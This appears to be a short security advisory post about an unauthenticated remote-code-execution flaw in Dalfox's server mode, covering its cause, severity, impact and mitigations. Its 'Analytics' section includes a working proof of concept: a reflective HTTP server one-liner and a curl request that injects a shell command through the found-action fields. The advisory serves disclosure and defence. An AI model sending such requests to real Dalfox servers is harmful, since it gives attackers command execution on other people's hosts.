Listen to this Post
How the mentioned vulnerability works:
Dalfox server mode binds to 0.0.0.0:6664 by default with no API key required.
The –api-key flag defaults to empty string, making authentication opt-in.
POST /scan endpoint deserializes JSON into model.Options struct directly.
model.Options includes FoundAction and FoundActionShell fields from user input.
No sanitization strips these fields before passing to dalfox.Initialize.
Initialize function explicitly copies both fields into new scan options.
When a vulnerability is found, foundAction() executes command using FoundActionShell.
Attacker controls scanned URL and can force a finding (e.g., reflective XSS).
Attacker supplies shell command via “found-action” and “found-action-shell”.
Command execution happens on the host running dalfox server.
No API key middleware is registered when APIKey == “”.
Thus any network peer can reach the server and send malicious JSON.
The reflective server guarantees dalfox detects a vulnerability immediately.
exec.Command(options.FoundActionShell, “-c”, afterCmd) runs unsanitized.
afterCmd supports @@query@@, @@target@@, @@type@@ placeholders.
Attack complexity is low as attacker hosts a simple HTTP server.
Privileges required: none – default configuration is unauthenticated.
Scope changed: command execution escapes dalfox process to host OS.
CVSS 3.1 score 10.0 (Critical) due to full confidentiality, integrity, availability impact.
CWE-306 (Missing Authentication) and CWE-78 (OS Command Injection) apply.
dailycve form:
Platform: Dalfox Server
Version: All pre-patch
Vulnerability: RCE via found-action
Severity: Critical
date: 12 May 2026
Prediction: 15 June 2026
What Undercode Say:
Analytics
Detect exposed dalfox server
nmap -p 6664 --script=http-get /target
Check for missing auth
curl -X POST http://target:6664/scan -H 'Content-Type: application/json' -d '{"url":"http://test","options":{}}' --silent | grep -i "unauthorized" || echo "VULNERABLE"
Simulate malicious payload (PoC)
python3 -c "from http.server import HTTPServer, BaseHTTPRequestHandler; HTTPServer(('0.0.0.0', 18081), type('H', (BaseHTTPRequestHandler,), {'do_GET': lambda s: s.wfile.write(b'<html><body>XSS</body>'), 'log_message': lambda a: None})).serve_forever()" &
curl -X POST http://127.0.0.1:6664/scan -H 'Content-Type: application/json' -d '{"url":"http://127.0.0.1:18081/?q=test","options":{"found-action":"touch /tmp/pwned","found-action-shell":"bash","worker":1}}'
cat /tmp/pwned
Exploit:
Unauthenticated attacker sends POST /scan with JSON containing “found-action” and “found-action-shell”. Attacker also hosts a reflective HTTP server that echoes any query parameter into HTML. When dalfox scans that URL, it detects a reflected XSS finding, triggering foundAction() which executes the attacker’s shell command via bash -c.
Protection from this CVE:
- Require API key: reject startup if –api-key is empty (preferred).
2. Strip FoundAction/FoundActionShell from API-sourced requests in postScanHandler.
- Bind server to localhost only (–host 127.0.0.1) when possible.
- Use network firewall rules to restrict access to port 6664.
5. Upgrade to patched version once available.
Impact:
Full remote code execution on host running dalfox server. Attacker can read all files (secrets, configs, credentials), write arbitrary files (backdoors, persistence), kill processes, disrupt service, and move laterally using host privileges. Default 0.0.0.0 binding exposes public-facing instances in cloud environments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

